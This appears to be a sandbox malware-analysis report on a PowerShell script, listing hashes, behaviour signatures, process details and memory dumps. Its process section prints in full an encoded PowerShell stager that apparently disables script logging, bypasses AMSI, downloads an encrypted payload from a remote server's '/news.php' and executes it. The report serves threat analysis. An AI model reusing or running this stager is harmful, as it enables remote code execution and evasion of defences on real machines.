b195af69564d51cf3a6f26b6058f85d0bff09f0f2268e807ab4b50f458e06ca6

General

Target

9c328a584d6a90bbe94e13730d0cf62bafaf360ad6ef74f6655f1541d21f787e.ps1
Size

5KB
MD5

59ff315119e0fa26a73a334a489a135c
SHA1

bd75267ae8f3a87fe205497d841ec0cc325649a0
SHA256

b195af69564d51cf3a6f26b6058f85d0bff09f0f2268e807ab4b50f458e06ca6
SHA512

798193588b099d6990539ac5f4d76681f13cb82c65ba9cd17ca8132dad75403314450cb62b97bc869d7b8dccb32af3a25df92c7dc542b409eb9d274c40d5df5f

Score

8^/10

Malware Config

Signatures

Blacklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

6 1576 powershell.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exe

pid process

392 powershell.exe
1576 powershell.exe
1576 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 392 powershell.exe
Token: SeDebugPrivilege 1576 powershell.exe

flow	pid	process
6	1576	powershell.exe

pid	process
392	powershell.exe
1576	powershell.exe
1576	powershell.exe

description	pid	process
Token: SeDebugPrivilege	392	powershell.exe
Token: SeDebugPrivilege	1576	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 392 wrote to memory of 1576	392	powershell.exe	powershell.exe
PID 392 wrote to memory of 1576	392	powershell.exe	powershell.exe
PID 392 wrote to memory of 1576	392	powershell.exe	powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\9c328a584d6a90bbe94e13730d0cf62bafaf360ad6ef74f6655f1541d21f787e.ps1
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAHIAcwBJAE8ATgBUAEEAYgBsAGUALgBQAFMAVgBFAHIAUwBJAE8AbgAuAE0AYQBqAG8AUgAgAC0AZwBFACAAMwApAHsAJAA5ADMAOQA9AFsAcgBlAEYAXQAuAEEAcwBzAEUAbQBiAEwAWQAuAEcARQB0AFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAVABGAGkAZQBgAEwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJAA5ADMAOQApAHsAJAA3ADkAMAA9ACQAOQAzADkALgBHAGUAdABWAGEAbAB1AEUAKAAkAE4AdQBsAGwAKQA7AEkARgAoACQANwA5ADAAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAA3ADkAMABbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA3ADkAMABbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAYQBMAD0AWwBDAE8AbABsAGUAYwB0AGkATwBOAHMALgBHAEUAbgBFAFIAaQBDAC4ARABpAGMAdABpAG8AbgBBAFIAeQBbAHMAdAByAEkATgBHACwAUwB5AHMAdABFAE0ALgBPAGIASgBlAEMAdABdAF0AOgA6AG4ARQBXACgAKQA7ACQAdgBhAGwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBBAGwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAA3ADkAMABbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AEEAbAB9AEUATABzAGUAewBbAFMAYwByAGkAcAB0AEIATABvAEMAawBdAC4AIgBHAEUAdABGAGkAZQBgAEwAZAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAFQAVgBBAEwAVQBFACgAJABuAFUATABMACwAKABOAEUAVwAtAE8AQgBqAGUAYwBUACAAQwBvAEwATABlAEMAdABJAG8AbgBzAC4ARwBlAG4ARQBSAGkAYwAuAEgAYQBzAGgAUwBlAFQAWwBzAHQAcgBJAE4ARwBdACkAKQB9ACQAUgBFAGYAPQBbAFIAZQBGAF0ALgBBAHMAUwBlAG0AYgBMAHkALgBHAGUAVABUAHkAUABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAEUAZgAuAEcARQB0AEYASQBlAEwAZAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAHQAVgBBAEwAdQBlACgAJABOAFUAbABsACwAJABUAHIAdQBlACkAOwB9ADsAWwBTAFkAUwBUAGUAbQAuAE4ARQB0AC4AUwBlAHIAdgBJAEMARQBQAG8ASQBuAHQATQBhAG4AQQBnAGUAUgBdADoAOgBFAFgAcABlAEMAdAAxADAAMABDAG8ATgBUAGkATgBVAGUAPQAwADsAJAA1ADUAZgA9AE4AZQBXAC0ATwBiAGoARQBDAHQAIABTAFkAcwB0AGUAbQAuAE4AZQB0AC4AVwBFAEIAQwBsAEkAZQBOAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQARQB4AFQALgBFAG4AYwBvAEQAaQBOAEcAXQA6ADoAVQBOAGkAQwBvAGQARQAuAEcARQB0AFMAdABSAGkATgBHACgAWwBDAG8ATgBWAEUAUgBUAF0AOgA6AEYAUgBPAE0AQgBBAHMAZQA2ADQAUwB0AHIAaQBuAEcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAagBBAEcAVQBBAFoAUQBCAHoAQQBHAHMAQQBiAHcAQgB3AEEARwBnAEEAYQBRAEIAegBBAEcAZwBBAGEAUQBCAHUAQQBHAGMAQQBZAHcAQgBoAEEARwAwAEEAYwBBAEIAaABBAEcAawBBAFoAdwBCAHUAQQBFAEUAQQBVAEEAQgBVAEEARABFAEEATQB3AEEAegBBAEQAYwBBAEwAZwBCAGoAQQBHADgAQQBiAFEAQQA2AEEARABnAEEATQBBAEEAPQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAA1ADUAZgAuAEgAZQBhAGQARQByAHMALgBBAGQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkADUANQBmAC4AUAByAG8AeABZAD0AWwBTAFkAcwBUAEUATQAuAE4ARQB0AC4AVwBlAEIAUgBFAHEAdQBFAHMAdABdADoAOgBEAEUAZgBhAHUAbAB0AFcARQBiAFAAUgBPAHgAWQA7ACQANQA1AEYALgBQAFIAbwBYAHkALgBDAHIAZQBEAEUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAFkAUwBUAEUAbQAuAE4AZQB0AC4AQwBSAGUARABFAG4AVABpAGEATABDAEEAQwBIAGUAXQA6ADoARABlAEYAYQB1AGwAdABOAEUAVAB3AG8AUgBrAEMAUgBFAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAA1ADUAZgAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwB5AHMAdABlAE0ALgBUAEUAeABUAC4ARQBOAGMAbwBkAEkATgBHAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAWQB0AGUAcwAoACcAeABZAGsAZgBEAEAAbwBwACMAKwBTAHYANQBlAFoAVwBxADYASgAlAGwALwBWAGkAPwBfAGcAQQBYAEcAPgBDACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAFIAZwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAHUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAWABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQANQA1AGYALgBIAGUAYQBEAEUAUgBzAC4AQQBEAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAFMAUABpAFkAZwBPAGYAPQBZAHYAcgA0AGMANwA1AGsAQwBZADYANQBlADMAQwBsADEALwAwADIAcQByAFoAQQBuAC8AYwA9ACIAKQA7ACQAZABhAHQAYQA9ACQANQA1AGYALgBEAE8AVwBuAGwAbwBBAGQARABBAHQAYQAoACQAcwBFAFIAKwAkAFQAKQA7ACQAaQBWAD0AJABEAGEAdABBAFsAMAAuAC4AMwBdADsAJABkAGEAVABhAD0AJABEAEEAVABBAFsANAAuAC4AJABEAEEAdABhAC4AbABFAG4AZwB0AEgAXQA7AC0ASgBPAGkAbgBbAEMAaABhAFIAWwBdAF0AKAAmACAAJABSACAAJABkAEEAVABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=
2⤵
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1576

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
1eeb56acaf92f52fc38d6c689ced4baa

SHA1
302e00dde204328b66da84e364eb07a6709c4bc7

SHA256
1e24dd4d6dab84a8cc4eb074b9a12d9ed5e514c42dce1a4e9f71266cf07ba826

SHA512
e529d0c1488e510866dcc88a6e60b30c0bb50744927f429fcf200d158ba73fbb293c86c3589612f1cb7ddaaf3127bdc5f4018147888feeef328aea165e452475

Download Submit
memory/392-3-0x00000000025E0000-0x00000000025E1000-memory.dmp

Filesize
4KB

Download
memory/392-2-0x000000001AE40000-0x000000001AE41000-memory.dmp

Filesize
4KB

Download
memory/392-0-0x000007FEF6130000-0x000007FEF6B1C000-memory.dmp

Filesize
9.9MB

Download
memory/392-4-0x0000000001F90000-0x0000000001F91000-memory.dmp

Filesize
4KB

Download
memory/392-1-0x00000000024B0000-0x00000000024B1000-memory.dmp

Filesize
4KB

Download
memory/1576-5-0x0000000000000000-mapping.dmp

Download
memory/1576-7-0x000007FEF6130000-0x000007FEF6B1C000-memory.dmp

Filesize
9.9MB

Download
memory/1576-12-0x000000001C290000-0x000000001C291000-memory.dmp

Filesize
4KB

Download
memory/1576-13-0x000000001ABC0000-0x000000001ABC1000-memory.dmp

Filesize
4KB

Download
memory/1576-16-0x000000001ABF0000-0x000000001ABF1000-memory.dmp

Filesize
4KB

Download
memory/1576-28-0x000000001B8E0000-0x000000001B8E1000-memory.dmp

Filesize
4KB

Download
memory/1576-29-0x000000001B8F0000-0x000000001B8F1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads